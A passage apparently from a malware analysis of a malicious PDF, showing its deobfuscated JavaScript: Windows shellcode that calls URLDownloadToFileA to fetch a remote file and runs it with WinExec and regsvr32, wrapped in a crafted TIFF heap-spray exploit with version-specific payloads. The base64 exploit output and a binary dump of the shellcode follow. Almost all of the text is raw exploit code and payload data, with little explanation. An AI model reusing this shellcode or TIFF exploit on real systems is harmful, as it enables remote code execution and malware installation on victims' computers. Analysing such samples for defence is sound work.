    shell = "\xE8\x00\x00\x00\x00]\x83\xED\x051\xC9d\x8Bq0\x8Bv\x0C\x8Bv\x1C\x8BF\x08\x8B~ \x8B6f9O\x18u\xF2\xBE\xEF\x00\x00\x00\x01\xEE\xBF\xCF\x00\x00\x00\x01\xEF\xE8\x80\x01\x00\x00\x89\xEA\x81\xC2\xEF\x00\x00\x00Rh\x80\x00\x00\x00\xFF\x95\xCF\x00\x00\x00\x89\xEA\x81\xC2\xEF\x00\x00\x001\xF6\x01\xC2\x8A\x9C5\x00\x02\x00\x00\x80\xFB\x00t\x06\x88\x1C2F\xEB\xEE\xC6\x042\x00\x89\xEA\x81\xC2\xE2\x01\x00\x00R\xFF\x95\xD3\x00\x00\x00\x89\xEA\x81\xC2\xED\x01\x00\x00RP\xFF\x95\xD7\x00\x00\x00j\x00j\x00\x89\xEA\x81\xC2\xEF\x00\x00\x00R\x89\xEA\x81\xC2\x0B\x02\x00\x00Rj\x00\xFF\xD0j\x05\x89\xEA\x81\xC2\xEF\x00\x00\x00R\xFF\x95\xDB\x00\x00\x00j\x05\x89\xEA\x81\xC2\xE3\x00\x00\x00R\xFF\x95\xDB\x00\x00\x00j\x00\xFF\x95\xDF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00regsvr32 -s GetTempPathA\x00LoadLibraryA\x00GetProcAddress\x00WinExec\x00ExitProcess\x00\xBB\x89\xF2\x89\xF70\xC0\xAEu\xFD)\xF7\x89\xF91\xC0\xBE<\x00\x00\x00\x03\xB5\xB8\x01\x00\x00f\xAD\x03\x85\xB8\x01\x00\x00\x8Bpx\x83\xC6\x1C\x03\xB5\xB8\x01\x00\x00\x8D\xBD\xBC\x01\x00\x00\xAD\x03\x85\xB8\x01\x00\x00\xAB\xAD\x03\x85\xB8\x01\x00\x00P\xAB\xAD\x03\x85\xB8\x01\x00\x00\xAB^1\xDB\xADV\x03\x85\xB8\x01\x00\x00\x89\xC6\x89\xD7Q\xFC\xF3\xA6Yt\x04^C\xEB\xE9^\x93\xD1\xE0\x03\x85\xC4\x01\x00\x001\xF6\x96f\xAD\xC1\xE0\x02\x03\x85\xBC\x01\x00\x00\x89\xC6\xAD\x03\x85\xB8\x01\x00\x00\xC3\xEB\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89\x85\xB8\x01\x00\x00VW\xE8X\xFF\xFF\xFF_^\xAB\x01\xCE\x80>\xBBt\x02\xEB\xED\xC3URLMON.DLL\x00URLDownloadToFileA\x00User32.exe\x00";
    shell += url_var;
    while (shell.length < 1044) shell += "\x00";
    shell = base64_encode(shell);

    if (get_ver() < 9000) {
        end_tiff = "o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAABReASiBWhEoPY4BKo+uASjAggkqvWIBKXVyASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQQUXgEpqaVmNEE2BSgUXgEp0JASNMFOBSgUXgEpBQUFBeAzzpEtTgUoCF4BKQUFBQTHJZItxMIt2DIt2HItuCItGIIs2ZjlIGHXyi0U8i1QFeAHqi3IgAe4xyUGtAeiLGCtYBIH75SDd/3XvSYtaJAHrZosMS4taHAHrAyyLieZqBP82/9WFwK119YE4SUkqAHXtljHJtQPzpQ==";
    } else {
        end_tiff = "kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAApWOASiAJikqWIYBKkB+ASjCQhErYp4BKjauASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQaVjgEpqaVmNM7WASqVjgEp0JASNT0uCSqVjgEp4DPOkIg6CSqJjgEpBQUFBMclki3Ewi3YMi3Yci24Ii0YgizZmOUgYdfKLRTyLVAV4AeqLciAB7jHJQa0B6IsYK1gEgfvlIN3/de9Ji1okAetmiwxLi1ocAesDLIuJ5moE/zb/1YXArXX1gThJSSoAde2WMcm1A/Ol";
    }
    tiff = "SUkqADggAACQ" + grow('QUFB', 2000) + shell + grow('kJCQ', 7592);
    tiff += "kAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////" + end_tiff;
    //pgGzgu.rawValue = tiff;
    console.log(tiff);
}
//@malforsec add due to heavy deletion in previous step
fGRdP = "";
// @malforsec - end add section
run();


And we get this output, base64-encoded as the script says:


SUkqADggAACQQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFB6AAAAABdg+OFMclki3Ewi3YMi3YciOYIi34gizZmOU8YdfK+7wAAAAHuv88AAAAB7+iAAQAAieqBwu8AAABSaIAAAAD/lc8AAACJ6oHC7wAAADH2AcKKnDUAAgAAgPsAdAaIHDJG6+7GBDIAieqBwuIBAABS/5XTAAAAieqBwuOBAABSUP+V1wAAAGoAagCJ6oHC7wAAAFKJ6oHCCwIAAFJqAP/QagWJ6oHC7wAAAFL/ldsAAABqBYnqgcLjAAAAUv+V2wAAAGoA/5XfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAByZWdzdnIzMiAtcyBHZXRUZW1wUGFOaEEATG9hZExpYnJhcnlBAEdldFByb2NBZGRyZXNzAFdpbkV4ZWMARXhpdFByb2Nlc3MAu4nyifcwwK51/Sn3ifkxwL48AAAAA7W4AQAAZqODhbgBAACLcHiDxhwDtbgBAACNvbwBAACtA4W4AQAAq6ODhbgBAABQq6ODhbgBAACrXjHbrVYDhbgBAACJxonXUfzzpllOBF5D6+lek9HgA4XEAQAAMfaWZq3B4AIDhbwBAACJxqODhbgBAADD6xAAAAAAAAAAAAAAAAAAAAAAiYW4AQAAVlfoWP///19eqwHOgD67dALr7cNVUkxNTO4uRExMAFVSTERvd25sb2FkVG9GaWxlQQBVc2VyMzIuZXhlACZoPTAzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAABReASiBWhEoPY4BKo+uASjAggkqvWIBKXVyASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQQUXgEpqaVmNEE2BSgUXgEpOJASNMFOBSgUXgEpBQUFBeAzzpEtTgUoCF4BKQUFBQTHJZItxMIt2DIt2HItuCItGIIs2ZjlIGHXyiOU8i1QFeAHqi3IgAe4xyUGtAeiLGCtYBIH75SDd/3XvSYtaJAHrZosMS4taHAHrAyyLieZqBP82/9WFwK119YE4SUkqAHXtljHJtQPzpQ==


And the binary output:


^@^@^@^@]<83>í^E1Éd<8b>q0<8b>v^L<8b>v^\<8b>F^H<8b>~ <8b>6f9O^Xuò¾ï^@^@^@^Aî¿Ï^@^@^@^Aïè<80>^A^@^@<89>ê<81>Âï^@^@^@Rh<80>^@^@^@ÿ<95>Ï^@^@^@<89>ê<81>Âï^@^@^@1ö^AÂ<8a><9c>5^@^B^@^@<80>û^@t^F<88>^\2FëîÆ^D2^@<89>ê<81>Ââ^A^@^@Rÿ<95>Ó^@^@^@<89>ê<81>Âí^A^@^@RPÿ<95>×^@^@^@j^@j^@<89>ê<81>Âï^@^@^@R<89>ê<81>Â^K^B^@^@Rj^@ÿÐj^E<89>ê<81>Âï^@^@^@Rÿ<95>Û^@^@^@j^E<89>ê<81>Âã^@^@^@Rÿ<95>Û^@^@^@j^@ÿ<95>ß^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@regsvr32 -s GetTempPathA^@LoadLibraryA^@GetProcAddress^@WinExec^@ExitProcess^@»<89>ò<89>÷0À®uý)÷<89>ù1À¾<^@^@^@^Cµ¸^A^@^@f­^C<85>¸^A^@^@<8b>px<83>Æ^\^Cµ¸^A^@^@<8d>½¼^A^@^@­^C<85>¸^A^@^@«­^C<85>¸^A^@^@P«­^C<85>¸^A^@^@«^1Û­V^C<85>¸^A^@^@<89>Æ<89>×Qüó¦Yt^D^Cëé^<93>Ñà^C<85>Ä^A^@^@1ö<96>f­Áà^B^C<85>¼^A^@^@<89>Æ­^C<85>¸^A^@^@Ãë^P^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@<89><85>¸^A^@^@VWèXÿÿÿ_^«^AÎ<80>>»t^BëíÃURLMON.DLL^@URLDownloadToFileA^@User32.exe^@&h=03^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^